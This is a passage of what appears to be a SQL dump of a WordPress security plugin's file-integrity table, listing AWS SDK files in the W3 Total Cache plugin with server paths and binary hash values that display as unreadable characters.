\"\rI','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/Exception/MediaStoreException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/Exception/MediaStoreException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$slD>','9!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/MediaStoreClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaStore/MediaStoreClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-','|fM|;z:O\\kGp@8','lzH@H W=iw-\0^','',0,'?'),('0׭;\nK\\9j','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Middleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Middleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z!+-_l}X8','yqޣvʺSJeP-*B-^6zf','',0,'?'),('XaH;0\Zn','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHub/Exception/MigrationHubException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MigrationHub/Exception/MigrationHubException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8','\rb\ZtK<,XO$W/R\0','',0,'?'),('ZK Skp','',0,'?'),('1\Zib8q/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/Exception/MobileException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/Exception/MobileException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=^8ը/\"','o?q^tVA\\','',0,'?'),('[  ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/MobileClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Mobile/MobileClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8\03','cnEcŧƥxt\ZeLaK','',0,'?'),(' tJs-sSo','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MockHandler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MockHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c=g@T+\n0','6z.H{ZY8z:B50','',0,'?'),('LS\Z7/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MonitoringEventsInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MonitoringEventsInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4J2y&','/j{hl6E./{{P9\"','',0,'?'),('t($','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MultiRegionClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MultiRegionClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TS[lTv{&ŕn0','8iR9ƭ]^g','',0,'?'),('-2ޔmY4gx','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploadManager.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploadManager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','| cގ_eb','LUNM${ %1 9$)','',0,'?'),(' kGX','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/AbstractUploader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1&պnY','ltx\'\0;dg!\"e :','',0,'?'),('\"2\nl\'Xz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/UploadState.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Multipart/UploadState.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^b|lr{Ixm0','Up,JR_yY&6EWc=)Fѕ','',0,'?'),('59ttVH','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/Exception/NeptuneException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/Exception/NeptuneException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4SoUꉊBgS','\0 +xg _:Ojs}','',0,'?'),(' \\OgMw5`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/NeptuneClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Neptune/NeptuneClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_TRpT-','T^^fm2FȓfW~Ӣ\"o\"4v','',0,'?'),('>:hv`y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/Exception/NetworkManagerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/Exception/NetworkManagerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U}]wߖ','㭘4jx%=\'Mңmvxc/f;','',0,'?'),('퍅2ffoI','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/NetworkManagerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NetworkManager/NetworkManagerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GQN7-_','[[xh??Xn kyx','',0,'?'),('','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NimbleStudio/Exception/NimbleStudioException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/NimbleStudio/Exception/NimbleStudioException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\\*:/P','ž(f\n ָf~G{YCO:)8+','',0,'?'),('l/[ωRto1Ob','',0,'?'),('\Z$.@<=b','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorks/OpsWorksClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/OpsWorks/OpsWorksClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b6Bq^]','\ryOTIVD^.R,/ iYq','',0,'?'),('`Q+U3[tB73maLn?','',0,'?'),('KYnxಇXoC','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/Exception/OrganizationsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/Exception/OrganizationsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZB0./F','.@æģ}n&\n68(~N8','',0,'?'),('3r;)}!C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/OrganizationsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Organizations/OrganizationsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k*°m%Oa','{OaƇuMrwDzI','',0,'?'),('\'ToO[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/Exception/OutpostsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/Exception/OutpostsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I2,Jh','\0CJ_T2\'MPU7#\"ժ','',0,'?'),('هt/L}lD','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/OutpostsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Outposts/OutpostsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e1Mf(uRuk','eoj$4& vZT,UL*ʒ紇','',0,'?'),('\\?q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/Exception/PIException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/Exception/PIException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2S\Z\rBq8','ca(uzT%lփl@\\ LH?i','',0,'?'),('ޏn(`J\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/PIClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PI/PIClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wzqS7jLi:)','{G8 A,\n摞)','',0,'?'),('F;!ײ61h','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/Exception/PersonalizeException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/Exception/PersonalizeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%72E','\'6`\rw\r _iu[','',0,'?'),('Z\Z\"ʬ5 G','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/PersonalizeClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Personalize/PersonalizeClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','et]\'wӺy%#P2@k','',0,'?'),('\\.$33','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/Exception/PersonalizeRuntimeException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/Exception/PersonalizeRuntimeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jP9Xɰޕ-','o&]QCXcUp50&t','',0,'?'),('hHș({򜰩','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/PersonalizeRuntimeClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PersonalizeRuntime/PersonalizeRuntimeClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jƀ 9;!*\ZV','&fc.zO\"K`ZJ\r%nâMJc','',0,'?'),('̊Eϖy6','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PhpHash.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PhpHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q @*m','?h@6i;;(I%M޳%z\0E','',0,'?'),('DwlS gX}ڨմ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/Exception/PinpointException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/Exception/PinpointException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u[=-+M','I\rhHrX9q\"a6','',0,'?'),('f~b:Lv%','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/PinpointClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pinpoint/PinpointClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q 2z8O{','80169 єXVF.%;E)','',0,'?'),('Fth','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/Exception/PinpointEmailException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/Exception/PinpointEmailException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xȫ/_y','\nB8@YǍX0Х5A~$t2 5','',0,'?'),('d}[T&x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/PinpointEmailClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointEmail/PinpointEmailClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dtkp92I%','{(M5̜cmS\'STp','',0,'?'),('|xHrZk','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/Exception/PinpointSMSVoiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/Exception/PinpointSMSVoiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/F\Z ~}i','#VԐd%\n+ ];I\ZG','',0,'?'),('cVn5r`5','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/PinpointSMSVoiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PinpointSMSVoice/PinpointSMSVoiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u{\rޯ0:Q','Rbd#C6 =blf$F_N','',0,'?'),('E#&(?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/Exception/PollyException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/Exception/PollyException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m \0턛','[v e,+!܈@~Ǫ F?6AI','',0,'?'),('olz\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/PollyClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Polly/PollyClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qp]w\n','/\n\' D$_lHGd\r^ H','',0,'?'),('\"\\ t)j+e','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PresignUrlMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/PresignUrlMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@/n. )Э','\"O8CR\n*ܘ^hǗo','',0,'?'),('h!P\rxX)Y\\Up','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/Exception/PricingException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/Exception/PricingException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J9t\"Ai&','.C{-5QHVAR¶1-8','',0,'?'),('%`}.\")Ի','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/PricingClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Pricing/PricingClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Asiie&SD?Ƽ9','rMB;\Zs`A0Cß~ud acH~ii','',0,'?'),('-ͻTj5\0\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/Exception/QLDBException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/Exception/QLDBException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\\_O4[?8<','{2b Ic1A;88*8؟ˋe','',0,'?'),('}r#H&','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/QLDBClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDB/QLDBClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fh\Zh~\r','I/;svUeCjJ=\">','',0,'?'),('镔ȜFq\0?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/Exception/QLDBSessionException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/Exception/QLDBSessionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';`-Z}\r','P0Y\'wl\\v 80z/ N#I(','',0,'?'),('z܀ϯK@P','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/QLDBSessionClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QLDBSession/QLDBSessionClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\F8m_X}[','_;ãjFN8c>Mq[8?#','',0,'?'),('\"{r֕״V%2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QuickSight/Exception/QuickSightException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/QuickSight/Exception/QuickSightException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\r;bS','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RDSDataService/RDSDataServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RDSDataService/RDSDataServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.b$as','&Kͷ@ԗl|v /}h$uX','',0,'?'),('4,zRa\Z<=|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/AuthTokenGenerator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/AuthTokenGenerator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Soԯ\\\nmRz',',, kuŒ. =Z}','',0,'?'),(' |4VsC@L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/Exception/RdsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/Exception/RdsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t3CTIURd','KqIzAI8b}yБI#$I*P','',0,'?'),('-]AiW`U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/RdsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Rds/RdsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\\UT*','hk+,[ lt76}q','',0,'?'),('[X','',0,'?'),('b_Nr&` ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroups/ResourceGroupsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroups/ResourceGroupsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hJ{EKd','#`k끬\0+#>žM2','',0,'?'),('X@ڊZ!\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/Exception/ResourceGroupsTaggingAPIException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/Exception/ResourceGroupsTaggingAPIException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&1\0MAsMc','\rQRK~)o9t@=\0\"R4','',0,'?'),('\0p Y21D','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/ResourceGroupsTaggingAPIClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/ResourceGroupsTaggingAPIClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(+\r>X}d','YT\nzf<[6\\f-mf;lD{d','',0,'?'),('ɽ;^\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResponseContainerInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResponseContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yv~]Ic3oN','% 0O79!/\\y,,ZdŤ\08=','',0,'?'),('6zEeq(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DH+T`5`֞','`nIpvC\0rV@::Õ?\0]:','',0,'?'),(';r$J\"NM㻵M]\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultPaginator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultPaginator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ARjQ','\ZzYx,Ie_#;݊g\'=H\0!','',0,'?'),('d&$ P]','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Configuration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Configuration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`ނu_99Ha','R)t 1[MJRcO!JzkB','',0,'?'),('\0y#1 ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC_R]Gh','p.ԇ\"rI/kGÖJ@','',0,'?'),('ds8a4r\rpY','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pp5T\"(','CX@&\Z|(VdsmY','',0,'?'),('RO ט\rXD','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Exception/ConfigurationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Exception/ConfigurationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fcұ\Z<(\"kY','7U LV?ϳ!5Z}\' E\\','',0,'?'),('\"q=FEk}q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/QuotaManager.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/QuotaManager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GFsw','o&4a^4g3cc,F ','',0,'?'),('#:\\Ua62gyF]q','\n8_C\"Xb]:O1','',0,'?'),('xSޖq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointArnMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointArnMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i! ª+9Ջ)','{\Z{\r\rbp?NY )','',0,'?'),('Qpj}75;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':2yw-a','5Z $Κ2㝛TV@','',0,'?'),('\nxpm\nk7\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/CryptoParamsTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/CryptoParamsTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qh\0T/X','}5g2xx~dUkS8','',0,'?'),('y|T(h(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/InstructionFileMetadataStrategy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/InstructionFileMetadataStrategy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(wА','q0lW}\"tՃ&fA=j,','',0,'?'),('|DMc=%','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<]1','~ /f왊@$p.{AY[q.S','',0,'?'),('!0s?a(R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClientV2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClientV2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wБlX/i','K2X3u\0uK0KgoXV1','',0,'?'),('OeG\0:cy','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vgd:up','ӛFV \Zt\n㮗Vm[=','',0,'?'),('`|f:8&','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploaderV2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploaderV2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q11@ou -','EYE[1l݊ ϲK+גx\Z\'ݯh','',0,'?'),('{Z6\\*^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/UserAgentTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/UserAgentTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TT~_~P','Y::[>*¾_tg}ڲ휁','',0,'?'),('sYSb|KsA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/EndpointRegionHelperTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/EndpointRegionHelperTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zd~A,!~pI','AkI.\"Z-܂Cgy:0','',0,'?'),('i\'QX[f','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/DeleteMultipleObjectsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/DeleteMultipleObjectsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nMYѯ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f@Yysq0','\r jG Z[5ȩXSªy','',0,'?'),('sK,0h|miD\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3MultipartUploadException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3MultipartUploadException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L+Zʢb','>Vَͺ$Qn ','',0,'?'),(' 